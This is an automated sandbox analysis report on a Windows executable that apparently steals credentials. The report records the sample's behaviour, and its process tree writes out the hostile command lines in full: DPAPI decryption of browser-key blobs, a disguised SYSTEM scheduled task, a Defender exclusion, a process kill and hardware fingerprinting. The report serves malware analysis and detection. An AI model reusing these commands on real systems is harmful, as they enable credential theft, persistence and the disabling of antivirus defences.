Analysis

Max time kernel: 15s
Max time network: 22s
Platform: windows10-2004_x64
Resource: win10v2004-20240226-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 11/05/2024, 07:36

Behavioral task: behavioral1
Sample: 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Resource: win7-20240215-en

General

Target: 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Size: 37.6MB
MD5: dbcc5cfb5b91fae4370930affd3d7ef9
SHA1: 5e5598375c5abeee8c18c9c28a5138e3763df29b
SHA256: 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
SHA512: 0b66dbb037c5e30a451732403d5e0f278588bf78d4c12d660b75f53713f05e233bb5785942155f5dab88ecb92edc789c8b583621077077f7bee1b56f20dc8584
SSDEEP: 393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg196l+ZArYsFRlQ6x:R3on1HvSzxAMN1FZArYsDPv47OZRqIx
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 3 IoCs)
Run PowerShell and hide display window.
  pid   Process
  2128  powershell.exe
  5036  powershell.exe
  4192  powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                  Process
  Key value queried  \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

Loads dropped DLL (1 IoCs)
  pid   Process
  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  11    api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)
  pid   Process
  2572  cmd.exe
  4448  cmd.exe

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid  Process
  452  schtasks.exe

Enumerates processes with tasklist (1 TTPs, 2 IoCs)
  pid   Process
  2988  tasklist.exe
  3356  tasklist.exe

Kills process with taskkill (1 IoCs)
  pid   Process
  2424  taskkill.exe

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   Process
  5036  powershell.exe
  5036  powershell.exe
  1492  powershell.exe
  1492  powershell.exe
  2160  powershell.exe
  2160  powershell.exe
  2128  powershell.exe

Suspicious use of AdjustPrivilegeToken (28 IoCs)
  description                          pid   Process
  Token: SeDebugPrivilege              5036  powershell.exe
  Token: SeDebugPrivilege              2988  tasklist.exe
  Token: SeDebugPrivilege              2424  taskkill.exe
  Token: SeDebugPrivilege              3356  tasklist.exe
  Token: SeDebugPrivilege              1492  powershell.exe
  Token: SeDebugPrivilege              2160  powershell.exe
  Token: SeDebugPrivilege              2128  powershell.exe
  Token: SeIncreaseQuotaPrivilege      4584  WMIC.exe
  Token: SeSecurityPrivilege           4584  WMIC.exe
  Token: SeTakeOwnershipPrivilege      4584  WMIC.exe
  Token: SeLoadDriverPrivilege         4584  WMIC.exe
  Token: SeSystemProfilePrivilege      4584  WMIC.exe
  Token: SeSystemtimePrivilege         4584  WMIC.exe
  Token: SeProfSingleProcessPrivilege  4584  WMIC.exe
  Token: SeIncBasePriorityPrivilege    4584  WMIC.exe
  Token: SeCreatePagefilePrivilege     4584  WMIC.exe
  Token: SeBackupPrivilege             4584  WMIC.exe
  Token: SeRestorePrivilege            4584  WMIC.exe
  Token: SeShutdownPrivilege           4584  WMIC.exe
  Token: SeDebugPrivilege              4584  WMIC.exe
  Token: SeSystemEnvironmentPrivilege  4584  WMIC.exe
  Token: SeRemoteShutdownPrivilege     4584  WMIC.exe
  Token: SeUndockPrivilege             4584  WMIC.exe
  Token: SeManageVolumePrivilege       4584  WMIC.exe
  Token: 33                            4584  WMIC.exe
  Token: 34                            4584  WMIC.exe
  Token: 35                            4584  WMIC.exe
  Token: 36                            4584  WMIC.exe

Suspicious use of WriteProcessMemory (48 IoCs)
  description                       pid   Process                                                                 procid_target
  PID 4344 wrote to memory of 4676  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  92
  PID 4344 wrote to memory of 4676  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  92
  PID 4676 wrote to memory of 1436  4676  cmd.exe                                                                 93
  PID 4676 wrote to memory of 1436  4676  cmd.exe                                                                 93
  PID 4676 wrote to memory of 5036  4676  cmd.exe                                                                 94
  PID 4676 wrote to memory of 5036  4676  cmd.exe                                                                 94
  PID 5036 wrote to memory of 512   5036  powershell.exe                                                          95
  PID 5036 wrote to memory of 512   5036  powershell.exe                                                          95
  PID 512 wrote to memory of 2260   512   csc.exe                                                                 96
  PID 512 wrote to memory of 2260   512   csc.exe                                                                 96
  PID 4344 wrote to memory of 4336  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  97
  PID 4344 wrote to memory of 4336  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  97
  PID 4344 wrote to memory of 3088  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  98
  PID 4344 wrote to memory of 3088  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  98
  PID 3088 wrote to memory of 2988  3088  cmd.exe                                                                 100
  PID 3088 wrote to memory of 2988  3088  cmd.exe                                                                 100
  PID 4336 wrote to memory of 4188  4336  cmd.exe                                                                 99
  PID 4336 wrote to memory of 4188  4336  cmd.exe                                                                 99
  PID 4344 wrote to memory of 756   4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  102
  PID 4344 wrote to memory of 756   4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  102
  PID 756 wrote to memory of 2424   756   cmd.exe                                                                 103
  PID 756 wrote to memory of 2424   756   cmd.exe                                                                 103
  PID 4344 wrote to memory of 2228  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  104
  PID 4344 wrote to memory of 2228  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  104
  PID 4344 wrote to memory of 2572  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  105
  PID 4344 wrote to memory of 2572  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  105
  PID 2228 wrote to memory of 3356  2228  cmd.exe                                                                 106
  PID 2228 wrote to memory of 3356  2228  cmd.exe                                                                 106
  PID 2572 wrote to memory of 1492  2572  cmd.exe                                                                 107
  PID 2572 wrote to memory of 1492  2572  cmd.exe                                                                 107
  PID 4344 wrote to memory of 4448  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  108
  PID 4344 wrote to memory of 4448  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  108
  PID 4448 wrote to memory of 2160  4448  cmd.exe                                                                 109
  PID 4448 wrote to memory of 2160  4448  cmd.exe                                                                 109
  PID 4344 wrote to memory of 1812  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  110
  PID 4344 wrote to memory of 1812  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  110
  PID 4344 wrote to memory of 4512  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  111
  PID 4344 wrote to memory of 4512  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  111
  PID 4344 wrote to memory of 3908  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  112
  PID 4344 wrote to memory of 3908  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  112
  PID 4344 wrote to memory of 1976  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  113
  PID 4344 wrote to memory of 1976  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  113
  PID 1976 wrote to memory of 2128  1976  cmd.exe                                                                 114
  PID 1976 wrote to memory of 2128  1976  cmd.exe                                                                 114
  PID 1812 wrote to memory of 4584  1812  cmd.exe                                                                 116
  PID 1812 wrote to memory of 4584  1812  cmd.exe                                                                 116
  PID 4344 wrote to memory of 4756  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  117
  PID 4344 wrote to memory of 4756  4344  6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe  117
Processes

Each entry gives the process image path, its PID and full command line, followed by the signatures that fired on it. The number in brackets is the depth in the process tree; indentation follows the parent/child relationship.

[1] PID 4344  C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

  [2] PID 4676  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      - Suspicious use of WriteProcessMemory

    [3] PID 1436  C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

    [3] PID 5036  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -noprofile -
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] PID 512  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w0mmhcwn\w0mmhcwn.cmdline"
          - Suspicious use of WriteProcessMemory

        [5] PID 2260  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES341B.tmp" "c:\Users\Admin\AppData\Local\Temp\w0mmhcwn\CSC818140766A5C469DBC3C62159FB5524.TMP"

  [2] PID 4336  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      - Suspicious use of WriteProcessMemory

    [3] PID 4188  C:\Windows\system32\curl.exe
        Command line: curl http://api.ipify.org/ --ssl-no-revoke

  [2] PID 3088  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      - Suspicious use of WriteProcessMemory

    [3] PID 2988  C:\Windows\system32\tasklist.exe
        Command line: tasklist
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken

  [2] PID 756  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
      - Suspicious use of WriteProcessMemory

    [3] PID 2424  C:\Windows\system32\taskkill.exe
        Command line: taskkill /IM msedge.exe /F
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

  [2] PID 2228  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      - Suspicious use of WriteProcessMemory

    [3] PID 3356  C:\Windows\system32\tasklist.exe
        Command line: tasklist
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken

  [2] PID 2572  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Suspicious use of WriteProcessMemory

    [3] PID 1492  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

  [2] PID 4448  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,217,63,211,151,50,59,23,14,157,120,173,214,75,168,44,4,86,215,197,221,15,211,57,168,170,96,26,224,123,202,176,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,18,94,83,33,10,127,43,207,118,25,163,52,85,137,171,176,54,29,140,152,151,60,207,249,173,64,112,136,115,160,201,198,48,0,0,0,128,39,129,224,38,93,129,6,223,202,165,111,102,236,160,251,177,38,22,194,235,129,171,61,192,137,129,16,112,252,72,62,10,204,202,185,244,12,160,149,156,225,125,30,180,211,209,177,64,0,0,0,217,129,143,47,147,156,214,93,117,216,121,231,75,189,241,110,215,1,53,65,179,41,61,227,177,21,51,235,139,102,59,83,7,39,162,98,116,173,160,235,7,227,134,248,109,167,4,20,209,189,188,85,142,159,80,126,61,15,85,255,177,30,169,242), $null, 'CurrentUser')"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Suspicious use of WriteProcessMemory

    [3] PID 2160  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,217,63,211,151,50,59,23,14,157,120,173,214,75,168,44,4,86,215,197,221,15,211,57,168,170,96,26,224,123,202,176,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,18,94,83,33,10,127,43,207,118,25,163,52,85,137,171,176,54,29,140,152,151,60,207,249,173,64,112,136,115,160,201,198,48,0,0,0,128,39,129,224,38,93,129,6,223,202,165,111,102,236,160,251,177,38,22,194,235,129,171,61,192,137,129,16,112,252,72,62,10,204,202,185,244,12,160,149,156,225,125,30,180,211,209,177,64,0,0,0,217,129,143,47,147,156,214,93,117,216,121,231,75,189,241,110,215,1,53,65,179,41,61,227,177,21,51,235,139,102,59,83,7,39,162,98,116,173,160,235,7,227,134,248,109,167,4,20,209,189,188,85,142,159,80,126,61,15,85,255,177,30,169,242), $null, 'CurrentUser')
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

  [2] PID 1812  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      - Suspicious use of WriteProcessMemory

    [3] PID 4584  C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic diskdrive get serialnumber
        - Suspicious use of AdjustPrivilegeToken

  [2] PID 4512  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

    [3] PID 4452  C:\Windows\system32\reg.exe
        Command line: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

  [2] PID 3908  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

    [3] PID 452  C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
        - Creates scheduled task(s)

  [2] PID 1976  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
      - Suspicious use of WriteProcessMemory

    [3] PID 2128  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] PID 3808  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mctnrend\mctnrend.cmdline"

        [5] PID 2448  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D11.tmp" "c:\Users\Admin\AppData\Local\Temp\mctnrend\CSCF38C7E581E3047888C51AE4E1E55E0A7.TMP"

  [2] PID 4756  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

    [3] PID 876  C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic bios get smbiosbiosversion

  [2] PID 1368  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

    [3] PID 4548  C:\Windows\system32\cscript.exe
        Command line: cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

      [4] PID 2884  C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

        [5] PID 4192  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
            - Command and Scripting Interpreter: PowerShell

  [2] PID 2776  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

    [3] PID 1712  C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic baseboard get serialnumber

  [2] PID 5036  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

    [3] PID 1396  C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic MemoryChip get /format:list

    [3] PID 1752  C:\Windows\system32\find.exe
        Command line: find /i "Speed"

  [2] PID 2876  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

    [3] PID 1796  C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic path win32_computersystemproduct get uuid

  [2] PID 836  C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"

    [3] PID 2516  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell wininit.exe

      [4] PID 2768  C:\Windows\system32\wininit.exe
          Command line: "C:\Windows\system32\wininit.exe"
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize: 1.8MB
MD5: 66a65322c9d362a23cf3d3f7735d5430
SHA1: ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256: f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512: 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21